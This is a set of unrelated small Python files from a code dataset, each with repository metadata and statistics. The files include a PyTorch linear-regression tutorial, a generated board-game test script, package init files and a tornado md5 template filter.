8f55d899ff508eb8a1d177c797a6fd9fbcf92c39
91
py
Python
bempy/django/blocks/href/__init__.py
svetlyak40wt/bempy
ad87982d17c2d14c344d9e3d91a48c37dfb72535
[ "BSD-3-Clause" ]
1
2015-04-29T15:19:45.000Z
2015-04-29T15:19:45.000Z
bempy/django/blocks/href/__init__.py
svetlyak40wt/bempy
ad87982d17c2d14c344d9e3d91a48c37dfb72535
[ "BSD-3-Clause" ]
null
null
null
bempy/django/blocks/href/__init__.py
svetlyak40wt/bempy
ad87982d17c2d14c344d9e3d91a48c37dfb72535
[ "BSD-3-Clause" ]
1
2019-06-10T16:08:54.000Z
2019-06-10T16:08:54.000Z
from bempy import block


@block()
def href(text, url):
    return dict(text=text, url=url)
15.166667
35
0.692308
15
91
4.2
0.666667
0.222222
0
0
0
0
0
0
0
0
0
0
0.175824
91
5
36
18.2
0.84
0
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0
0.25
0.25
0.75
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
56de048f5c2b7053194f6036eac5cfdc158231ae
119
py
Python
blaze/expr/scalar/__init__.py
chdoig/blaze
caa5a497e1ca1ceb1cf585483312ff4cd74d0bda
[ "BSD-3-Clause" ]
1
2015-01-18T23:59:57.000Z
2015-01-18T23:59:57.000Z
blaze/expr/scalar/__init__.py
chdoig/blaze
caa5a497e1ca1ceb1cf585483312ff4cd74d0bda
[ "BSD-3-Clause" ]
null
null
null
blaze/expr/scalar/__init__.py
chdoig/blaze
caa5a497e1ca1ceb1cf585483312ff4cd74d0bda
[ "BSD-3-Clause" ]
null
null
null
from .core import *
from .numbers import *
from .boolean import *
from .interface import *
from .parser import exprify
19.833333
27
0.756303
16
119
5.625
0.5
0.444444
0
0
0
0
0
0
0
0
0
0
0.168067
119
5
28
23.8
0.909091
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7103ed3a8dc345aca78dea3c696fddc42f31afa8
4,939
py
Python
z2/part2/interactive/jm/random_fuzzy_arrows_1/946790979.py
kozakusek/ipp-2020-testy
09aa008fa53d159672cc7cbf969a6b237e15a7b8
[ "MIT" ]
1
2020-04-16T12:13:47.000Z
2020-04-16T12:13:47.000Z
z2/part2/interactive/jm/random_fuzzy_arrows_1/946790979.py
kozakusek/ipp-2020-testy
09aa008fa53d159672cc7cbf969a6b237e15a7b8
[ "MIT" ]
18
2020-03-06T17:50:15.000Z
2020-05-19T14:58:30.000Z
z2/part2/interactive/jm/random_fuzzy_arrows_1/946790979.py
kozakusek/ipp-2020-testy
09aa008fa53d159672cc7cbf969a6b237e15a7b8
[ "MIT" ]
18
2020-03-06T17:45:13.000Z
2020-06-09T19:18:31.000Z
from part1 import (
    gamma_board,
    gamma_busy_fields,
    gamma_delete,
    gamma_free_fields,
    gamma_golden_move,
    gamma_golden_possible,
    gamma_move,
    gamma_new,
)

"""
scenario: test_random_actions
uuid: 946790979
"""
"""
random actions, total chaos
"""

board = gamma_new(5, 7, 6, 4)
assert board is not None

assert gamma_move(board, 1, 3, 2) == 1
assert gamma_move(board, 1, 1, 5) == 1
assert gamma_move(board, 2, 0, 2) == 1
assert gamma_move(board, 2, 3, 3) == 1
assert gamma_move(board, 3, 6, 0) == 0
assert gamma_move(board, 4, 2, 2) == 1
assert gamma_move(board, 4, 3, 6) == 1
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 3, 1) == 1
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 6, 0, 6) == 1
assert gamma_move(board, 1, 4, 3) == 1
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_move(board, 2, 1, 4) == 1
assert gamma_move(board, 2, 0, 2) == 0
assert gamma_move(board, 3, 2, 4) == 1
assert gamma_free_fields(board, 3) == 24
assert gamma_move(board, 4, 2, 6) == 1
assert gamma_move(board, 4, 0, 5) == 1
assert gamma_free_fields(board, 4) == 22
assert gamma_move(board, 5, 0, 0) == 1
assert gamma_move(board, 5, 1, 5) == 0
assert gamma_move(board, 6, 4, 4) == 1
assert gamma_move(board, 6, 1, 0) == 1
assert gamma_free_fields(board, 6) == 19
assert gamma_move(board, 1, 6, 4) == 0
assert gamma_move(board, 1, 1, 6) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 4) == 0
assert gamma_move(board, 2, 3, 2) == 0
assert gamma_move(board, 3, 5, 2) == 0
assert gamma_move(board, 4, 1, 4) == 0
assert gamma_move(board, 4, 3, 0) == 1
assert gamma_busy_fields(board, 4) == 5
assert gamma_move(board, 5, 5, 2) == 0
assert gamma_move(board, 6, 4, 0) == 1
assert gamma_move(board, 6, 2, 4) == 0
assert gamma_move(board, 1, 1, 2) == 1
assert gamma_move(board, 1, 4, 3) == 0
assert gamma_move(board, 2, 5, 2) == 0
assert gamma_free_fields(board, 2) == 15
assert gamma_move(board, 5, 4, 0) == 0
assert gamma_busy_fields(board, 5) == 2
assert gamma_move(board, 6, 4, 0) == 0
assert gamma_move(board, 6, 4, 5) == 1
assert gamma_move(board, 2, 3, 3) == 0
assert gamma_move(board, 3, 4, 6) == 1
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 0, 1) == 0
assert gamma_move(board, 5, 3, 1) == 0
assert gamma_move(board, 5, 3, 0) == 0
assert gamma_move(board, 6, 1, 2) == 0
assert gamma_move(board, 6, 0, 5) == 0
assert gamma_golden_move(board, 6, 6, 2) == 0
assert gamma_move(board, 1, 5, 3) == 0
assert gamma_free_fields(board, 1) == 4
assert gamma_move(board, 2, 2, 3) == 1
assert gamma_move(board, 3, 3, 0) == 0
assert gamma_move(board, 5, 1, 4) == 0
assert gamma_move(board, 6, 4, 0) == 0
assert gamma_move(board, 1, 1, 0) == 0
assert gamma_golden_move(board, 1, 5, 0) == 0
assert gamma_move(board, 2, 0, 2) == 0
assert gamma_move(board, 2, 2, 6) == 0
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 3, 4, 5) == 0
assert gamma_free_fields(board, 4) == 5
assert gamma_move(board, 6, 4, 3) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 0, 4) == 1
assert gamma_move(board, 3, 5, 2) == 0
assert gamma_move(board, 4, 1, 6) == 0
assert gamma_move(board, 4, 2, 5) == 1
assert gamma_move(board, 5, 1, 4) == 0
assert gamma_move(board, 6, 2, 3) == 0
assert gamma_busy_fields(board, 6) == 5
assert gamma_move(board, 1, 1, 1) == 1
assert gamma_move(board, 1, 0, 4) == 0
assert gamma_move(board, 4, 1, 0) == 0
assert gamma_move(board, 4, 2, 1) == 1
assert gamma_move(board, 5, 0, 2) == 0
assert gamma_move(board, 6, 2, 6) == 0
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 1, 1) == 0
assert gamma_move(board, 3, 5, 3) == 0
assert gamma_move(board, 3, 0, 1) == 1
assert gamma_free_fields(board, 3) == 7
assert gamma_move(board, 4, 2, 1) == 0
assert gamma_move(board, 5, 0, 2) == 0
assert gamma_move(board, 6, 5, 3) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_free_fields(board, 1) == 2
assert gamma_move(board, 2, 1, 4) == 0

board159991877 = gamma_board(board)
assert board159991877 is not None
assert board159991877 == ("61443\n"
                          "414.6\n"
                          "223.6\n"
                          "..221\n"
                          "2141.\n"
                          "3145.\n"
                          "56.46\n")
del board159991877
board159991877 = None

assert gamma_move(board, 3, 0, 5) == 0
assert gamma_move(board, 3, 4, 6) == 0
assert gamma_move(board, 4, 5, 3) == 0
assert gamma_move(board, 4, 3, 2) == 0
assert gamma_move(board, 5, 1, 3) == 1
assert gamma_busy_fields(board, 5) == 3
assert gamma_move(board, 6, 1, 4) == 0
assert gamma_move(board, 6, 1, 4) == 0
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_move(board, 1, 1, 1) == 0
assert gamma_move(board, 2, 3, 4) == 1
assert gamma_move(board, 3, 3, 2) == 0
assert gamma_move(board, 3, 1, 2) == 0
assert gamma_move(board, 4, 2, 4) == 0

gamma_delete(board)
33.598639
46
0.651751
929
4,939
3.310011
0.051668
0.386341
0.434146
0.578862
0.868293
0.84065
0.668943
0.358374
0.218537
0.217886
0
0.121945
0.188095
4,939
146
47
33.828767
0.644888
0
0
0.121212
0
0
0.010101
0
0
0
0
0
0.840909
1
0
false
0
0.007576
0
0.007576
0
0
0
0
null
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
6
710b961e1ad5947f0ed951b546cf5901fe703f83
29
py
Python
SoundcloudDownloader/__init__.py
AmirMohammad2003/soundcloud-downloader
298cb4819013bed0d1fe4ac33900b562aa005cdf
[ "MIT" ]
1
2022-02-15T15:51:23.000Z
2022-02-15T15:51:23.000Z
SoundcloudDownloader/__init__.py
AmirMohammad2003/soundcloud-downloader
298cb4819013bed0d1fe4ac33900b562aa005cdf
[ "MIT" ]
null
null
null
SoundcloudDownloader/__init__.py
AmirMohammad2003/soundcloud-downloader
298cb4819013bed0d1fe4ac33900b562aa005cdf
[ "MIT" ]
null
null
null
from .downloader import SCDL
14.5
28
0.827586
4
29
6
1
0
0
0
0
0
0
0
0
0
0
0
0.137931
29
1
29
29
0.96
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
711bf1c98d07609f3f236bbc8c2ef1df6122afa1
14,950
py
Python
apps/drl/chpA01/e01/chp_a01_e01.py
yt7589/iching
6673da38f4c80e7fd297c86fedc5616aee8ac09b
[ "Apache-2.0" ]
32
2020-04-14T08:32:18.000Z
2022-02-09T07:05:08.000Z
apps/drl/chpA01/e01/chp_a01_e01.py
trinh-hoang-hiep/iching
e1feae5741c3cbde535d7a275b01d4f0cf9e21ed
[ "Apache-2.0" ]
1
2020-04-08T10:42:15.000Z
2020-04-15T01:38:03.000Z
apps/drl/chpA01/e01/chp_a01_e01.py
trinh-hoang-hiep/iching
e1feae5741c3cbde535d7a275b01d4f0cf9e21ed
[ "Apache-2.0" ]
4
2020-08-25T03:56:46.000Z
2021-05-11T05:55:51.000Z
import numpy as np  # was commented out in the original, but load_ds below needs it
import torch
from torch.utils.data import DataLoader
import sklearn.model_selection as skm
from apps.drl.chpA01.e01.chp_a01_e01_ds import ChpA01E01Ds
from apps.drl.chpA01.e01.chp_a01_e01_model import ChpA01E01Model


class ChpA01E01(object):
    def __init__(self):
        self.name = ''
        self.model_file = './work/lnrn.pt'

    def startup(self, args={}):
        print('linear regression adam')
        #self.lnrn_plain()
        #self.lnrn_sgd()
        #self.lnrn_adam()
        #self.lnrn_adam_mse()
        #self.lnrn_with_ds()
        #self.lnrn_with_model()
        #self.lnrn_gpu()
        #self.lnrn_eval()
        #self.lnrn_save_load()
        self.lnrn_ds_split()

    # train and valid split
    def lnrn_ds_split(self):
        print('split train/validation/test datasets v0.0.1')
        # load dataset
        ds = ChpA01E01Ds(num=1000)
        total_count = len(ds)
        train_count = int(0.7 * total_count)
        valid_count = int(0.2 * total_count)
        test_count = total_count - train_count - valid_count
        train_ds, valid_ds, test_ds = torch.utils.data.random_split(
            ds, (train_count, valid_count, test_count))
        train_batch_size = 10
        valid_batch_size = 23
        test_batch_size = 88
        train_dl = DataLoader(train_ds, batch_size=train_batch_size, shuffle=True)
        valid_dl = DataLoader(valid_ds, batch_size=valid_batch_size, shuffle=False)
        test_dl = DataLoader(test_ds, batch_size=test_batch_size, shuffle=False)
        # define the model
        device = self.get_exec_device()
        model = ChpA01E01Model().to(device)
        # define the loss function
        criterion = torch.nn.MSELoss()
        # define optimization method
        #learning_params = model.parameters()  # needs epochs=100 to converge
        learning_params = []
        for k, v in model.named_parameters():
            if k == 'w001':
                learning_params.append({'params': v, 'lr': 0.01})
            elif k == 'b001':
                learning_params.append({'params': v, 'lr': 0.1})
        optimizer = torch.optim.Adam(learning_params, lr=0.001)
        epochs = 10
        best_loss = 10000.0
        unimproved_loop = 0
        improved_threshold = 0.000000001
        max_unimproved_loop = 5
        train_done = False
        for epoch in range(epochs):
            model.train()
            for X, y_hat in train_dl:
                optimizer.zero_grad()
                X, y_hat = X.to(device), y_hat.to(device)
                y = model(X)
                loss = criterion(y, y_hat)
                lossv = 0.0
                for Xv, yv_hat in valid_dl:
                    with torch.no_grad():
                        Xv, yv_hat = Xv.to(device), yv_hat.to(device)
                        yv = model(Xv)
                        lossv += criterion(yv, yv_hat)
                lossv /= valid_count
                if lossv < best_loss:
                    # save the model
                    torch.save(model.state_dict(), self.model_file)
                if lossv < best_loss - improved_threshold:
                    unimproved_loop = 0
                else:
                    unimproved_loop += 1
                best_loss = lossv
                if unimproved_loop >= max_unimproved_loop:
                    train_done = True
                    break  # early stopping
                loss.backward()
                optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss))
            if train_done:
                break
        # model evaluation
        test_loss = 0
        for X, y_hat in test_dl:
            X, y_hat = X.to(device), y_hat.to(device)
            with torch.no_grad():
                y = model(X)
                test_loss += criterion(y, y_hat)
        test_loss /= len(test_ds)
        print('loss on the test set: {0};'.format(test_loss))
        # load the model
        ckpt = torch.load(self.model_file)
        m1 = ChpA01E01Model()
        print('initial values: w={0}; b={1};'.format(m1.w001, m1.b001))
        m1.load_state_dict(ckpt)
        print('loaded values: w={0}; b={1};'.format(m1.w001, m1.b001))

    def lnrn_eval(self):
        # load dataset
        ds = ChpA01E01Ds(num=1000)
        batch_size = 10
        dl = DataLoader(ds, batch_size=batch_size, shuffle=True)
        # define the model
        device = self.get_exec_device()
        model = ChpA01E01Model().to(device)
        # define the loss function
        criterion = torch.nn.MSELoss()
        # define optimization method
        #learning_params = model.parameters()  # needs epochs=100 to converge
        learning_params = []
        for k, v in model.named_parameters():
            if k == 'w001':
                learning_params.append({'params': v, 'lr': 0.01})
            elif k == 'b001':
                learning_params.append({'params': v, 'lr': 0.1})
        optimizer = torch.optim.Adam(learning_params, lr=0.001)
        epochs = 10
        for epoch in range(epochs):
            model.train()
            for X, y_hat in dl:
                optimizer.zero_grad()
                X, y_hat = X.to(device), y_hat.to(device)
                y = model(X)
                loss = criterion(y, y_hat)
                loss.backward()
                optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss))
        # model evaluation
        test_num = 100
        test_ds = ChpA01E01Ds(num=test_num)
        model.eval()
        preds = []
        batch_size = 30
        test_dl = DataLoader(ds, batch_size=batch_size, shuffle=False)
        test_loss = 0
        for X, y_hat in test_dl:
            X, y_hat = X.to(device), y_hat.to(device)
            with torch.no_grad():
                y = model(X)
                test_loss += criterion(y, y_hat)
        test_loss /= test_num
        print('loss on the test set: {0};'.format(test_loss))

    def lnrn_save_load(self):
        # load dataset
        ds = ChpA01E01Ds(num=1000)
        batch_size = 10
        dl = DataLoader(ds, batch_size=batch_size, shuffle=True)
        # define the model
        device = self.get_exec_device()
        model = ChpA01E01Model().to(device)
        # define the loss function
        criterion = torch.nn.MSELoss()
        # define optimization method
        #learning_params = model.parameters()  # needs epochs=100 to converge
        learning_params = []
        for k, v in model.named_parameters():
            if k == 'w001':
                learning_params.append({'params': v, 'lr': 0.01})
            elif k == 'b001':
                learning_params.append({'params': v, 'lr': 0.1})
        optimizer = torch.optim.Adam(learning_params, lr=0.001)
        epochs = 10
        for epoch in range(epochs):
            model.train()
            for X, y_hat in dl:
                optimizer.zero_grad()
                X, y_hat = X.to(device), y_hat.to(device)
                y = model(X)
                loss = criterion(y, y_hat)
                loss.backward()
                optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss))
        # model evaluation
        test_num = 100
        test_ds = ChpA01E01Ds(num=test_num)
        model.eval()
        preds = []
        batch_size = 30
        test_dl = DataLoader(ds, batch_size=batch_size, shuffle=False)
        test_loss = 0
        for X, y_hat in test_dl:
            X, y_hat = X.to(device), y_hat.to(device)
            with torch.no_grad():
                y = model(X)
                test_loss += criterion(y, y_hat)
        test_loss /= test_num
        print('loss on the test set: {0};'.format(test_loss))
        print('model save and load test')
        # save the model
        torch.save(model.state_dict(), self.model_file)
        # load the model
        ckpt = torch.load(self.model_file)
        m1 = ChpA01E01Model()
        print('initial values: w={0}; b={1};'.format(m1.w001, m1.b001))
        m1.load_state_dict(ckpt)
        print('loaded values: w={0}; b={1};'.format(m1.w001, m1.b001))

    def ds_exp(self):
        ds = ChpA01E01Ds(num=1000)
        batch_size = 10
        dl = DataLoader(ds, batch_size=batch_size, shuffle=True)
        for X, y in dl:
            print('X: {0}; y: {1};'.format(X, y))
            break

    def lnrn_with_ds(self):
        # load dataset
        ds = ChpA01E01Ds(num=1000)
        batch_size = 10
        dl = DataLoader(ds, batch_size=batch_size, shuffle=True)
        # define the model
        w = torch.tensor(1.0, requires_grad=True)
        b = torch.tensor(0.0, requires_grad=True)
        # define the loss function
        criterion = torch.nn.MSELoss()
        # define optimization method
        optimizer = torch.optim.Adam([
            {'params': w, 'lr': 0.01},
            {'params': b, 'lr': 0.1}
        ], lr=0.001)
        epochs = 10
        for epoch in range(epochs):
            for X, y_hat in dl:
                optimizer.zero_grad()
                y = w * X + b
                loss = criterion(y, y_hat)
                loss.backward()
                optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss))

    def lnrn_with_model(self):
        # load dataset
        ds = ChpA01E01Ds(num=1000)
        batch_size = 10
        dl = DataLoader(ds, batch_size=batch_size, shuffle=True)
        # define the model
        model = ChpA01E01Model()
        # define the loss function
        criterion = torch.nn.MSELoss()
        # define optimization method
        #learning_params = model.parameters()  # needs epochs=100 to converge
        learning_params = []
        for k, v in model.named_parameters():
            if k == 'w001':
                learning_params.append({'params': v, 'lr': 0.01})
            elif k == 'b001':
                learning_params.append({'params': v, 'lr': 0.1})
        optimizer = torch.optim.Adam(learning_params, lr=0.001)
        epochs = 10
        for epoch in range(epochs):
            model.train()
            for X, y_hat in dl:
                optimizer.zero_grad()
                y = model(X)
                loss = criterion(y, y_hat)
                loss.backward()
                optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss))

    def get_exec_device(self):
        gpu_num = torch.cuda.device_count()
        for gi in range(gpu_num):
            print(torch.cuda.get_device_name(gi))
        pref_gi = 0
        if torch.cuda.is_available():
            if pref_gi is not None:
                device = 'cuda:{0}'.format(pref_gi)
            else:
                device = 'cuda'
        else:
            device = 'cpu'
        #device1 = 'cuda' if torch.cuda.is_available() else 'cpu'
        return device

    def lnrn_gpu(self):
        # load dataset
        ds = ChpA01E01Ds(num=1000)
        batch_size = 10
        dl = DataLoader(ds, batch_size=batch_size, shuffle=True)
        # define the model
        device = self.get_exec_device()
        model = ChpA01E01Model().to(device)
        # define the loss function
        criterion = torch.nn.MSELoss()
        # define optimization method
        #learning_params = model.parameters()  # needs epochs=100 to converge
        learning_params = []
        for k, v in model.named_parameters():
            if k == 'w001':
                learning_params.append({'params': v, 'lr': 0.01})
            elif k == 'b001':
                learning_params.append({'params': v, 'lr': 0.1})
        optimizer = torch.optim.Adam(learning_params, lr=0.001)
        epochs = 10
        for epoch in range(epochs):
            model.train()
            for X, y_hat in dl:
                optimizer.zero_grad()
                X, y_hat = X.to(device), y_hat.to(device)
                y = model(X)
                loss = criterion(y, y_hat)
                loss.backward()
                optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, model.w001, model.b001, loss))

    def lnrn_plain(self):
        X, y_hat = self.load_ds()
        w = torch.tensor(1.0, requires_grad=True)
        w_lr = 0.01
        b = torch.tensor(0.0, requires_grad=True)
        b_lr = 0.1
        epochs = 6000
        X = torch.tensor(X)
        y_hat = torch.tensor(y_hat)
        for epoch in range(epochs):
            y = w * X + b
            tl = 0.5 * (y - y_hat)**2
            loss = tl.sum() / 1000.0
            loss.backward()
            with torch.no_grad():
                w -= w_lr * w.grad
                w.grad = torch.zeros_like(w.grad)
                b -= b_lr * b.grad
                b.grad = torch.zeros_like(b.grad)
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss))

    def lnrn_sgd(self):
        X, y_hat = self.load_ds()
        w = torch.tensor(1.0, requires_grad=True)
        b = torch.tensor(0.0, requires_grad=True)
        epochs = 6000
        optimizer = torch.optim.SGD([
            {'params': w, 'lr': 0.01},
            {'params': b, 'lr': 0.1}
        ], 0.001)
        X = torch.tensor(X)
        y_hat = torch.tensor(y_hat)
        for epoch in range(epochs):
            optimizer.zero_grad()
            y = w * X + b
            tl = 0.5 * (y - y_hat)**2
            loss = tl.sum() / 1000.0
            loss.backward()
            optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss))

    def lnrn_adam(self):
        X, y_hat = self.load_ds()
        w = torch.tensor(1.0, requires_grad=True)
        b = torch.tensor(0.0, requires_grad=True)
        epochs = 6000
        optimizer = torch.optim.Adam([
            {'params': w, 'lr': 0.01},
            {'params': b, 'lr': 0.1}
        ], lr=0.001)
        X = torch.tensor(X)
        y_hat = torch.tensor(y_hat)
        for epoch in range(epochs):
            optimizer.zero_grad()
            y = w * X + b
            tl = 0.5 * (y - y_hat)**2
            loss = tl.sum() / 1000.0
            loss.backward()
            optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss))

    def lnrn_adam_mse(self):
        X, y_hat = self.load_ds()
        w = torch.tensor(1.0, requires_grad=True)
        w_lr = 0.01
        b = torch.tensor(0.0, requires_grad=True)
        b_lr = 0.1
        epochs = 1000
        criterion = torch.nn.MSELoss()
        optimizer = torch.optim.Adam([
            {'params': w, 'lr': 0.01},
            {'params': b, 'lr': 0.1}
        ], lr=0.001)
        X = torch.tensor(X)
        y_hat = torch.tensor(y_hat)
        for epoch in range(epochs):
            optimizer.zero_grad()
            y = w * X + b
            loss = criterion(y, y_hat)
            loss.backward()
            optimizer.step()
            print('{0}: w={1}; b={2}; loss={3};'.format(epoch, w, b, loss))

    def load_ds(self):
        b = 1.6
        w = 0.3
        X = np.linspace(0, 1.0, num=1000)
        y = w*X + b
        return X, y
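The lnrn_ds_split method above drives its early stopping with a best-loss threshold and a patience counter, woven into the training loop. A minimal standalone sketch of that same pattern; the fake loss curve is illustrative only (in practice val_loss comes from a validation DataLoader pass):

# illustrative validation losses, one per epoch
losses = [3.0, 2.0, 1.5, 1.4, 1.39, 1.39, 1.39, 1.39, 1.39, 1.39]

best_loss = float("inf")
threshold = 1e-9   # minimum improvement that resets the counter
patience = 5       # stop after this many non-improving epochs
bad_epochs = 0

for epoch, val_loss in enumerate(losses):
    if val_loss < best_loss - threshold:
        bad_epochs = 0        # real improvement: reset the counter
        best_loss = val_loss  # and remember the new best
    else:
        bad_epochs += 1
    if bad_epochs >= patience:
        print("early stop at epoch {0}".format(epoch))
        break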
36.286408
111
0.515853
1,905
14,950
3.891339
0.091864
0.0259
0.016188
0.035074
0.769189
0.759881
0.751787
0.751787
0.734251
0.734251
0
0.054282
0.357993
14,950
412
112
36.286408
0.718066
0.071104
0
0.760933
0
0
0.047419
0
0
0
0
0
0
1
0.043732
false
0
0.017493
0
0.069971
0.06414
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
713306af80f9bda8ed19e15977036787dfe99363
65
py
Python
common/schemas/base.py
GymWorkoutApp/gwa_common
0ff307ed6786e2991a26fb4c0afc33767ea9697d
[ "Unlicense" ]
null
null
null
common/schemas/base.py
GymWorkoutApp/gwa_common
0ff307ed6786e2991a26fb4c0afc33767ea9697d
[ "Unlicense" ]
1
2019-01-14T11:05:45.000Z
2019-01-14T11:05:45.000Z
common/schemas/base.py
GymWorkoutApp/gwa_common
0ff307ed6786e2991a26fb4c0afc33767ea9697d
[ "Unlicense" ]
null
null
null
from schematics import Model


class BaseSchema(Model):
    pass
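A minimal sketch of how such a base schema is typically extended, assuming schematics' standard field types; the UserSchema name and its field are illustrative, not from this repository:

from schematics import Model
from schematics.types import StringType


class BaseSchema(Model):
    pass


class UserSchema(BaseSchema):
    # schematics declares fields as class attributes
    name = StringType(required=True)


schema = UserSchema({"name": "Ada"})
schema.validate()  # raises DataError if required fields are missing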
10.833333
28
0.753846
8
65
6.125
0.875
0
0
0
0
0
0
0
0
0
0
0
0.2
65
5
29
13
0.942308
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
85542a696f124dad5f9fbd2a37905013b91e33cb
47
py
Python
__init__.py
ari-s/XpyY
384500b8112a4475f2df3e736f324ab8724f66c4
[ "Artistic-2.0" ]
null
null
null
__init__.py
ari-s/XpyY
384500b8112a4475f2df3e736f324ab8724f66c4
[ "Artistic-2.0" ]
null
null
null
__init__.py
ari-s/XpyY
384500b8112a4475f2df3e736f324ab8724f66c4
[ "Artistic-2.0" ]
null
null
null
from . import inputfilter, helpers, operations
23.5
46
0.808511
5
47
7.6
1
0
0
0
0
0
0
0
0
0
0
0
0.12766
47
1
47
47
0.926829
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8554be15e09c1822d22634b758aa964fa9ed48d7
54
py
Python
pbj/mesh/__init__.py
bem4solvation/pbj
4fa9c111596359192539787ae241a79d4316b15b
[ "MIT" ]
null
null
null
pbj/mesh/__init__.py
bem4solvation/pbj
4fa9c111596359192539787ae241a79d4316b15b
[ "MIT" ]
1
2022-02-18T17:34:37.000Z
2022-02-18T17:34:37.000Z
pbj/mesh/__init__.py
bem4solvation/pbj
4fa9c111596359192539787ae241a79d4316b15b
[ "MIT" ]
null
null
null
from .mesh_tools import *
from .charge_tools import *
18
27
0.777778
8
54
5
0.625
0.55
0
0
0
0
0
0
0
0
0
0
0.148148
54
2
28
27
0.869565
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8598df774d9eeecdd024d7959965af4b9f6bb33b
33
py
Python
bitbucketcli/__init__.py
jscheiber22/bitbucket-cli
e59cfec6b623d3b0764c57b87ffc30b6dc93ab49
[ "MIT" ]
null
null
null
bitbucketcli/__init__.py
jscheiber22/bitbucket-cli
e59cfec6b623d3b0764c57b87ffc30b6dc93ab49
[ "MIT" ]
null
null
null
bitbucketcli/__init__.py
jscheiber22/bitbucket-cli
e59cfec6b623d3b0764c57b87ffc30b6dc93ab49
[ "MIT" ]
null
null
null
from .bitbucket import Bitbucket
16.5
32
0.848485
4
33
7
0.75
0
0
0
0
0
0
0
0
0
0
0
0.121212
33
1
33
33
0.965517
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
85a0765a2793633cf4c9cac1fd0f21aaddc91051
21
py
Python
test/refactor/import_tree/pkgx/__init__.py
kirat-singh/jedi
65bc1c117b3175cb4d492484775c3fd7f207bc92
[ "MIT" ]
4,213
2015-01-02T15:43:22.000Z
2022-03-31T16:15:01.000Z
test/refactor/import_tree/pkgx/__init__.py
kirat-singh/jedi
65bc1c117b3175cb4d492484775c3fd7f207bc92
[ "MIT" ]
1,392
2015-01-02T18:43:39.000Z
2022-03-27T18:43:59.000Z
test/refactor/import_tree/pkgx/__init__.py
PeterJCLaw/jedi
070f191f550990c23220d7f209df076178307cf6
[ "MIT" ]
525
2015-01-02T19:07:31.000Z
2022-03-13T02:03:20.000Z
def pkgx():
    pass
7
11
0.52381
3
21
3.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.333333
21
2
12
10.5
0.785714
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
true
0.5
0
0
0.5
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
1
0
0
0
0
0
6
85c6e6e27c4642f174380f5896d05b5c193d6322
98
py
Python
template_filters.py
codeskyblue/bootstrap-tornado
bcfa0959b0125abdc2f018e15db39a07abc5d8b0
[ "MIT" ]
5
2017-10-18T19:30:16.000Z
2018-11-29T01:50:29.000Z
template_filters.py
codeskyblue/bootstrap-tornado
bcfa0959b0125abdc2f018e15db39a07abc5d8b0
[ "MIT" ]
null
null
null
template_filters.py
codeskyblue/bootstrap-tornado
bcfa0959b0125abdc2f018e15db39a07abc5d8b0
[ "MIT" ]
null
null
null
# coding: utf-8
#

import hashlib


def hashmd5(handler, s):
    return hashlib.md5(s).hexdigest()
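Note that hashlib.md5 accepts only bytes on Python 3, so the filter as written works for bytes input (or Python 2 str). A hedged Python 3-safe variant; the function name is illustrative, and the unused handler argument is kept to match the filter signature above:

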